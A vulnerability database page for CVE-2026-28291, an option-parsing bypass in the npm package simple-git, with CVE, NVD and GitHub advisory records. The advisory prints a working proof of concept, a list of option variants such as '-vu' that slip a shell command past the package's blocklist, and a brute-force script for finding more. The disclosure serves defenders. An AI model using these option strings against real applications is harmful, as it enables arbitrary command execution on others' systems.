Vulnerability-Lookup

CVE-2026-28291 (GCVE-0-2026-28291)

Vulnerability from cvelistv5 – Published: 2026-04-13 17:15 – Updated: 2026-04-14 16:30

Title

simple-git has Command Execution via Option-Parsing Bypass

Summary

simple-git enables running native Git commands from JavaScript. Versions up to and including 3.31.1 allow execution of arbitrary commands through Git option manipulation, bypassing safety checks meant to block dangerous options like -u and --upload-pack. The flaw stems from an incomplete fix for CVE-2022-25860, as Git's flexible option parsing allows numerous character combinations (e.g., -vu, -4u, -nu) to circumvent the regular-expression-based blocklist in the unsafe operations plugin. Due to the virtually infinite number of valid option variants that Git accepts, a complete blocklist-based mitigation may be infeasible without fully emulating Git's option parsing behavior. This issue has been fixed in version 3.32.0.

Severity ?

8.1 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/steveukx/git-js/security/advis…	x_refsource_CONFIRM
	https://github.com/steveukx/git-js/commit/1effd8e…	x_refsource_MISC
	https://github.com/steveukx/git-js/blob/789c13eba…	x_refsource_MISC
	https://github.com/steveukx/git-js/releases/tag/s…	x_refsource_MISC
	https://www.cve.org/CVERecord?id=CVE-2022-25860	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	steveukx	git-js	Affected: < 3.32.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-28291",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-04-14T13:53:36.631739Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-14T13:53:41.169Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/steveukx/git-js/security/advisories/GHSA-jcxm-m3jx-f287"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "git-js",
          "vendor": "steveukx",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 3.32.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "simple-git enables running native Git commands from JavaScript. Versions up to and including 3.31.1 allow execution of arbitrary commands through Git option manipulation, bypassing safety checks meant to block dangerous options like -u and --upload-pack. The flaw stems from an incomplete fix for CVE-2022-25860, as Git\u0027s flexible option parsing allows numerous character combinations (e.g., -vu, -4u, -nu) to circumvent the regular-expression-based blocklist in the unsafe operations plugin. Due to the virtually infinite number of valid option variants that Git accepts, a complete blocklist-based mitigation may be infeasible without fully emulating Git\u0027s option parsing behavior. This issue has been fixed in version 3.32.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-78",
              "description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-04-14T16:30:34.266Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/steveukx/git-js/security/advisories/GHSA-jcxm-m3jx-f287",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/steveukx/git-js/security/advisories/GHSA-jcxm-m3jx-f287"
        },
        {
          "name": "https://github.com/steveukx/git-js/commit/1effd8e5012a5da05a9776512fac3e39b11f2d2d",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/steveukx/git-js/commit/1effd8e5012a5da05a9776512fac3e39b11f2d2d"
        },
        {
          "name": "https://github.com/steveukx/git-js/blob/789c13ebabcf18ebe0b3a0c88ebb4037dede42e3/simple-git/src/lib/plugins/block-unsafe-operations-plugin.ts#L26",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/steveukx/git-js/blob/789c13ebabcf18ebe0b3a0c88ebb4037dede42e3/simple-git/src/lib/plugins/block-unsafe-operations-plugin.ts#L26"
        },
        {
          "name": "https://github.com/steveukx/git-js/releases/tag/simple-git%403.32.0",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/steveukx/git-js/releases/tag/simple-git%403.32.0"
        },
        {
          "name": "https://www.cve.org/CVERecord?id=CVE-2022-25860",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.cve.org/CVERecord?id=CVE-2022-25860"
        }
      ],
      "source": {
        "advisory": "GHSA-jcxm-m3jx-f287",
        "discovery": "UNKNOWN"
      },
      "title": "simple-git has Command Execution via Option-Parsing Bypass"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-28291",
    "datePublished": "2026-04-13T17:15:14.594Z",
    "dateReserved": "2026-02-26T01:52:58.735Z",
    "dateUpdated": "2026-04-14T16:30:34.266Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-28291",
      "date": "2026-04-17",
      "epss": "0.00095",
      "percentile": "0.26387"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-28291\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-13T18:16:28.760\",\"lastModified\":\"2026-04-17T15:38:09.243\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"simple-git enables running native Git commands from JavaScript. Versions up to and including 3.31.1 allow execution of arbitrary commands through Git option manipulation, bypassing safety checks meant to block dangerous options like -u and --upload-pack. The flaw stems from an incomplete fix for CVE-2022-25860, as Git\u0027s flexible option parsing allows numerous character combinations (e.g., -vu, -4u, -nu) to circumvent the regular-expression-based blocklist in the unsafe operations plugin. Due to the virtually infinite number of valid option variants that Git accepts, a complete blocklist-based mitigation may be infeasible without fully emulating Git\u0027s option parsing behavior. This issue has been fixed in version 3.32.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.2,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"}]}],\"references\":[{\"url\":\"https://github.com/steveukx/git-js/blob/789c13ebabcf18ebe0b3a0c88ebb4037dede42e3/simple-git/src/lib/plugins/block-unsafe-operations-plugin.ts#L26\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/steveukx/git-js/commit/1effd8e5012a5da05a9776512fac3e39b11f2d2d\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/steveukx/git-js/releases/tag/simple-git%403.32.0\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/steveukx/git-js/security/advisories/GHSA-jcxm-m3jx-f287\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://www.cve.org/CVERecord?id=CVE-2022-25860\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/steveukx/git-js/security/advisories/GHSA-jcxm-m3jx-f287\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-28291\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-14T13:53:36.631739Z\"}}}], \"references\": [{\"url\": \"https://github.com/steveukx/git-js/security/advisories/GHSA-jcxm-m3jx-f287\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-14T13:53:28.645Z\"}}], \"cna\": {\"title\": \"simple-git has Command Execution via Option-Parsing Bypass\", \"source\": {\"advisory\": \"GHSA-jcxm-m3jx-f287\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"steveukx\", \"product\": \"git-js\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 3.32.0\"}]}], \"references\": [{\"url\": \"https://github.com/steveukx/git-js/security/advisories/GHSA-jcxm-m3jx-f287\", \"name\": \"https://github.com/steveukx/git-js/security/advisories/GHSA-jcxm-m3jx-f287\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/steveukx/git-js/commit/1effd8e5012a5da05a9776512fac3e39b11f2d2d\", \"name\": \"https://github.com/steveukx/git-js/commit/1effd8e5012a5da05a9776512fac3e39b11f2d2d\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/steveukx/git-js/blob/789c13ebabcf18ebe0b3a0c88ebb4037dede42e3/simple-git/src/lib/plugins/block-unsafe-operations-plugin.ts#L26\", \"name\": \"https://github.com/steveukx/git-js/blob/789c13ebabcf18ebe0b3a0c88ebb4037dede42e3/simple-git/src/lib/plugins/block-unsafe-operations-plugin.ts#L26\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/steveukx/git-js/releases/tag/simple-git%403.32.0\", \"name\": \"https://github.com/steveukx/git-js/releases/tag/simple-git%403.32.0\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://www.cve.org/CVERecord?id=CVE-2022-25860\", \"name\": \"https://www.cve.org/CVERecord?id=CVE-2022-25860\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"simple-git enables running native Git commands from JavaScript. Versions up to and including 3.31.1 allow execution of arbitrary commands through Git option manipulation, bypassing safety checks meant to block dangerous options like -u and --upload-pack. The flaw stems from an incomplete fix for CVE-2022-25860, as Git\u0027s flexible option parsing allows numerous character combinations (e.g., -vu, -4u, -nu) to circumvent the regular-expression-based blocklist in the unsafe operations plugin. Due to the virtually infinite number of valid option variants that Git accepts, a complete blocklist-based mitigation may be infeasible without fully emulating Git\u0027s option parsing behavior. This issue has been fixed in version 3.32.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-78\", \"description\": \"CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-14T16:30:34.266Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-28291\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-14T16:30:34.266Z\", \"dateReserved\": \"2026-02-26T01:52:58.735Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-04-13T17:15:14.594Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-JCXM-M3JX-F287

Vulnerability from github – Published: 2026-04-13 16:35 – Updated: 2026-04-14 16:30

Summary

simple-git Affected by Command Execution via Option-Parsing Bypass

Details

Summary

simple-git enables running native Git commands from JavaScript. Some commands accept options that allow executing another command; because this is very dangerous, execution is denied unless the user explicitly allows it. This vulnerability allows a malicious actor who can control the options to execute other commands even in a “safe” state where the user has not explicitly allowed them. The vulnerability was introduced by an incorrect patch for CVE-2022-25860. It is likely to affect all versions prior to and including 3.28.0.

Detail

This vulnerability was introduced by an incorrect patch for CVE-2022-25860.

It was reproduced in the following environment:


WSL Docker
node: v22.19.0
git: git version 2.39.5
simple-git: 3.28.0

````

The issue was not reproduced on Windows 11.

The `-u` option, like `--upload-pack`, allows a command to be executed.

Currently, the `-u` and `--upload-pack` options are blocked in the file `simple-git/src/lib/plugins/block-unsafe-operations-plugin.ts`.

```ts
function preventUploadPack(arg: string, method: string) {
   if (/^\s*--(upload|receive)-pack/.test(arg)) {
      throw new GitPluginError(
         undefined,
         'unsafe',
         `Use of --upload-pack or --receive-pack is not permitted without enabling allowUnsafePack`
      );
   }

   if (method === 'clone' && /^\s*-u\b/.test(arg)) {
      throw new GitPluginError(
         undefined,
         'unsafe',
         `Use of clone with option -u is not permitted without enabling allowUnsafePack`
      );
   }

   if (method === 'push' && /^\s*--exec\b/.test(arg)) {
      throw new GitPluginError(
         undefined,
         'unsafe',
         `Use of push with option --exec is not permitted without enabling allowUnsafePack`
      );
   }
}
````

However, the problem is that command option parsing is quite flexible.

By brute forcing, I found various options that bypass the `-u` check.

[ '--u', '--u', '-4u', '-6u', '-lu', '-nu', '-qu', '-su', '-vu' ]


All of the above are three-character options that allow command execution. They enable execution even when `allowUnsafePack` is explicitly set to false.

The depressing fact is that the options I found are probably only a tiny fraction of all possible option formats that enable command execution. In addition to the `-u` option, there is also the `--upload-pack` option and others, and some of the options I found can probably be extended to arbitrary length. Considering this, the number of option variants that enable command execution is probably infinite.

Therefore, I could not find an effective way to block all such cases. Personally, I think it is virtually impossible to block this vulnerability completely. To fully block it, one would have to faithfully emulate Git’s option parsing rules, and it’s doubtful whether that is feasible.

Just in case, I’ll share the brute-force code I used to find options that enable command execution.

```js
const fs = require('fs');
const simpleGit = require('simple-git');

const TMP_DIR = './pwned/';
const ITER = 256;

function cleanTmpDir() {
    if (fs.existsSync(TMP_DIR)) {
        fs.rmSync(TMP_DIR, { recursive: true, force: true });
    }
    fs.mkdirSync(TMP_DIR, { recursive: true });
}

function getPwnedFiles() {
    const found = [];
    for (let i = 0; i < ITER; i++) {
        const fname1 = `${TMP_DIR}1_${i}`;
        const fname2 = `${TMP_DIR}2_${i}`;
        const fname3 = `${TMP_DIR}3_${i}`;
        if (fs.existsSync(fname1)) found.push(String.fromCharCode(i) + '-u');
        if (fs.existsSync(fname2)) found.push('-' + String.fromCharCode(i) + 'u');
        if (fs.existsSync(fname3)) found.push('-u' + String.fromCharCode(i));
    }
    return found;
}

async function runTest(runIdx) {
    const git = simpleGit();
    // 1. `${~}-u` Pattern
    for (let i = 0; i < ITER; i++) {
        try {
            await git.clone('./testrepo1', './testrepo2', [String.fromCharCode(i) + '-u', `sh -c \"touch ${TMP_DIR}1_${i}\"`]);
        } catch {}
    }
    // 2. `-${~}u` Pattern
    for (let i = 0; i < ITER; i++) {
        try {
            await git.clone('./testrepo1', './testrepo2', ['-' + String.fromCharCode(i) + 'u', `sh -c \"touch ${TMP_DIR}2_${i}\"`]);
        } catch {}
    }
    // 3. `-u${~}` Pattern
    for (let i = 0; i < ITER; i++) {
        try {
            await git.clone('./testrepo1', './testrepo2', ['-u' + String.fromCharCode(i), `sh -c \"touch ${TMP_DIR}3_${i}\"`]);
        } catch {}
    }
}

async function main() {
    cleanTmpDir();
    await runTest();

    const found = getPwnedFiles();

    console.log(found);
}

main();

PoC

The environment in which I succeeded is as follows. As long as the OS remains Linux, I suspect it will succeed reliably despite considerable variation in other factors.

WSL Docker
node: v22.19.0
git: git version 2.39.5
simple-git: 3.28.0

Create any git repository inside the testrepo1 folder. A very simple repository with a single commit and a single file is fine.

Run the following:

const { simpleGit } = require('simple-git');

async function main() {
    const git = await simpleGit({ unsafe: { allowUnsafePack: false } });
    await git.clone('./testrepo1', './testrepo2', [`-vu sh -c \"touch /tmp/pwned\"`]);
}

main();

This PoC explicitly configures allowUnsafePack to false. Of course, the same vulnerability occurs even without this option. An error is the expected behavior.

Check /tmp to confirm that pwned has been created. If it failed, try replacing -vu with a different option from the list.

Impact

This vulnerability is likely to affect all versions prior to and including 3.28.0. This is because it appears to be a continuation of the series of four vulnerabilities previously found in simple-git (CVE-2022-24433, CVE-2022-24066, CVE-2022-25912, CVE-2022-25860).

Severity ?

8.1 (High)


                  
                    CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "simple-git"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.32.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-28291"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-13T16:35:37Z",
    "nvd_published_at": "2026-04-13T18:16:28Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nsimple-git enables running native Git commands from JavaScript. Some commands accept options that allow executing another command; because this is very dangerous, execution is denied unless the user explicitly allows it. This vulnerability allows a malicious actor who can control the options to execute other commands even in a \u201csafe\u201d state where the user has not explicitly allowed them. The vulnerability was introduced by an incorrect patch for CVE-2022-25860. It is *likely* to affect all versions prior to and including 3.28.0.\n\n\n### Detail\n\nThis vulnerability was introduced by an incorrect patch for CVE-2022-25860.\n\nIt was reproduced in the following environment:\n\n```\n\nWSL Docker\nnode: v22.19.0\ngit: git version 2.39.5\nsimple-git: 3.28.0\n\n````\n\nThe issue was not reproduced on Windows 11.\n\nThe `-u` option, like `--upload-pack`, allows a command to be executed.\n\nCurrently, the `-u` and `--upload-pack` options are blocked in the file `simple-git/src/lib/plugins/block-unsafe-operations-plugin.ts`.\n\n```ts\nfunction preventUploadPack(arg: string, method: string) {\n   if (/^\\s*--(upload|receive)-pack/.test(arg)) {\n      throw new GitPluginError(\n         undefined,\n         \u0027unsafe\u0027,\n         `Use of --upload-pack or --receive-pack is not permitted without enabling allowUnsafePack`\n      );\n   }\n\n   if (method === \u0027clone\u0027 \u0026\u0026 /^\\s*-u\\b/.test(arg)) {\n      throw new GitPluginError(\n         undefined,\n         \u0027unsafe\u0027,\n         `Use of clone with option -u is not permitted without enabling allowUnsafePack`\n      );\n   }\n\n   if (method === \u0027push\u0027 \u0026\u0026 /^\\s*--exec\\b/.test(arg)) {\n      throw new GitPluginError(\n         undefined,\n         \u0027unsafe\u0027,\n         `Use of push with option --exec is not permitted without enabling allowUnsafePack`\n      );\n   }\n}\n````\n\nHowever, the problem is that command option parsing is quite flexible.\n\nBy brute forcing, I found various options that bypass the `-u` check.\n\n```\n[\n  \u0027--u\u0027, \u0027--u\u0027,\n  \u0027-4u\u0027, \u0027-6u\u0027,\n  \u0027-lu\u0027, \u0027-nu\u0027,\n  \u0027-qu\u0027, \u0027-su\u0027,\n  \u0027-vu\u0027\n]\n```\n\nAll of the above are three-character options that allow command execution. They enable execution even when `allowUnsafePack` is explicitly set to false.\n\nThe depressing fact is that the options I found are probably only a tiny fraction of all possible option formats that enable command execution. In addition to the `-u` option, there is also the `--upload-pack` option and others, and some of the options I found can probably be extended to arbitrary length. Considering this, the number of option variants that enable command execution is probably infinite.\n\nTherefore, I could not find an effective way to block all such cases. Personally, I think it is virtually impossible to block this vulnerability completely. To fully block it, one would have to faithfully emulate Git\u2019s option parsing rules, and it\u2019s doubtful whether that is feasible.\n\nJust in case, I\u2019ll share the brute-force code I used to find options that enable command execution.\n\n```js\nconst fs = require(\u0027fs\u0027);\nconst simpleGit = require(\u0027simple-git\u0027);\n\nconst TMP_DIR = \u0027./pwned/\u0027;\nconst ITER = 256;\n\nfunction cleanTmpDir() {\n    if (fs.existsSync(TMP_DIR)) {\n        fs.rmSync(TMP_DIR, { recursive: true, force: true });\n    }\n    fs.mkdirSync(TMP_DIR, { recursive: true });\n}\n\nfunction getPwnedFiles() {\n    const found = [];\n    for (let i = 0; i \u003c ITER; i++) {\n        const fname1 = `${TMP_DIR}1_${i}`;\n        const fname2 = `${TMP_DIR}2_${i}`;\n        const fname3 = `${TMP_DIR}3_${i}`;\n        if (fs.existsSync(fname1)) found.push(String.fromCharCode(i) + \u0027-u\u0027);\n        if (fs.existsSync(fname2)) found.push(\u0027-\u0027 + String.fromCharCode(i) + \u0027u\u0027);\n        if (fs.existsSync(fname3)) found.push(\u0027-u\u0027 + String.fromCharCode(i));\n    }\n    return found;\n}\n\nasync function runTest(runIdx) {\n    const git = simpleGit();\n    // 1. `${~}-u` Pattern\n    for (let i = 0; i \u003c ITER; i++) {\n        try {\n            await git.clone(\u0027./testrepo1\u0027, \u0027./testrepo2\u0027, [String.fromCharCode(i) + \u0027-u\u0027, `sh -c \\\"touch ${TMP_DIR}1_${i}\\\"`]);\n        } catch {}\n    }\n    // 2. `-${~}u` Pattern\n    for (let i = 0; i \u003c ITER; i++) {\n        try {\n            await git.clone(\u0027./testrepo1\u0027, \u0027./testrepo2\u0027, [\u0027-\u0027 + String.fromCharCode(i) + \u0027u\u0027, `sh -c \\\"touch ${TMP_DIR}2_${i}\\\"`]);\n        } catch {}\n    }\n    // 3. `-u${~}` Pattern\n    for (let i = 0; i \u003c ITER; i++) {\n        try {\n            await git.clone(\u0027./testrepo1\u0027, \u0027./testrepo2\u0027, [\u0027-u\u0027 + String.fromCharCode(i), `sh -c \\\"touch ${TMP_DIR}3_${i}\\\"`]);\n        } catch {}\n    }\n}\n\nasync function main() {\n    cleanTmpDir();\n    await runTest();\n\n    const found = getPwnedFiles();\n    \n    console.log(found);\n}\n\nmain();\n```\n\n### PoC\n\nThe environment in which I succeeded is as follows. As long as the OS remains Linux, I suspect it will succeed reliably despite considerable variation in other factors.\n\n```\nWSL Docker\nnode: v22.19.0\ngit: git version 2.39.5\nsimple-git: 3.28.0\n```\n\n1.\n\nCreate any git repository inside the `testrepo1` folder. A very simple repository with a single commit and a single file is fine.\n\n2.\n\nRun the following:\n\n```js\nconst { simpleGit } = require(\u0027simple-git\u0027);\n\nasync function main() {\n    const git = await simpleGit({ unsafe: { allowUnsafePack: false } });\n    await git.clone(\u0027./testrepo1\u0027, \u0027./testrepo2\u0027, [`-vu sh -c \\\"touch /tmp/pwned\\\"`]);\n}\n\nmain();\n```\n\nThis PoC explicitly configures `allowUnsafePack` to `false`. Of course, the same vulnerability occurs even without this option. An error is the expected behavior.\n\n3.\n\nCheck `/tmp` to confirm that `pwned` has been created.\nIf it failed, try replacing `-vu` with a different option from the list.\n\n### Impact\n\nThis vulnerability is *likely* to affect all versions prior to and including 3.28.0. This is because it appears to be a continuation of the series of four vulnerabilities previously found in simple-git (CVE-2022-24433, CVE-2022-24066, CVE-2022-25912, CVE-2022-25860).",
  "id": "GHSA-jcxm-m3jx-f287",
  "modified": "2026-04-14T16:30:46Z",
  "published": "2026-04-13T16:35:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/steveukx/git-js/security/advisories/GHSA-jcxm-m3jx-f287"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28291"
    },
    {
      "type": "WEB",
      "url": "https://github.com/steveukx/git-js/commit/1effd8e5012a5da05a9776512fac3e39b11f2d2d"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/steveukx/git-js"
    },
    {
      "type": "WEB",
      "url": "https://github.com/steveukx/git-js/blob/789c13ebabcf18ebe0b3a0c88ebb4037dede42e3/simple-git/src/lib/plugins/block-unsafe-operations-plugin.ts#L26"
    },
    {
      "type": "WEB",
      "url": "https://github.com/steveukx/git-js/releases/tag/simple-git%403.32.0"
    },
    {
      "type": "WEB",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-25860"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "simple-git Affected by Command Execution via Option-Parsing Bypass"
}

FKIE_CVE-2026-28291

Vulnerability from fkie_nvd - Published: 2026-04-13 18:16 - Updated: 2026-04-17 15:38

Severity ?

8.1 (High) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/steveukx/git-js/blob/789c13ebabcf18ebe0b3a0c88ebb4037dede42e3/simple-git/src/lib/plugins/block-unsafe-operations-plugin.ts#L26
	security-advisories@github.com	https://github.com/steveukx/git-js/commit/1effd8e5012a5da05a9776512fac3e39b11f2d2d
	security-advisories@github.com	https://github.com/steveukx/git-js/releases/tag/simple-git%403.32.0
	security-advisories@github.com	https://github.com/steveukx/git-js/security/advisories/GHSA-jcxm-m3jx-f287
	security-advisories@github.com	https://www.cve.org/CVERecord?id=CVE-2022-25860
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/steveukx/git-js/security/advisories/GHSA-jcxm-m3jx-f287

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "simple-git enables running native Git commands from JavaScript. Versions up to and including 3.31.1 allow execution of arbitrary commands through Git option manipulation, bypassing safety checks meant to block dangerous options like -u and --upload-pack. The flaw stems from an incomplete fix for CVE-2022-25860, as Git\u0027s flexible option parsing allows numerous character combinations (e.g., -vu, -4u, -nu) to circumvent the regular-expression-based blocklist in the unsafe operations plugin. Due to the virtually infinite number of valid option variants that Git accepts, a complete blocklist-based mitigation may be infeasible without fully emulating Git\u0027s option parsing behavior. This issue has been fixed in version 3.32.0."
    }
  ],
  "id": "CVE-2026-28291",
  "lastModified": "2026-04-17T15:38:09.243",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.2,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-04-13T18:16:28.760",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/steveukx/git-js/blob/789c13ebabcf18ebe0b3a0c88ebb4037dede42e3/simple-git/src/lib/plugins/block-unsafe-operations-plugin.ts#L26"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/steveukx/git-js/commit/1effd8e5012a5da05a9776512fac3e39b11f2d2d"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/steveukx/git-js/releases/tag/simple-git%403.32.0"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/steveukx/git-js/security/advisories/GHSA-jcxm-m3jx-f287"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-25860"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/steveukx/git-js/security/advisories/GHSA-jcxm-m3jx-f287"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-78"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-28291 (GCVE-0-2026-28291)

GHSA-JCXM-M3JX-F287

Summary

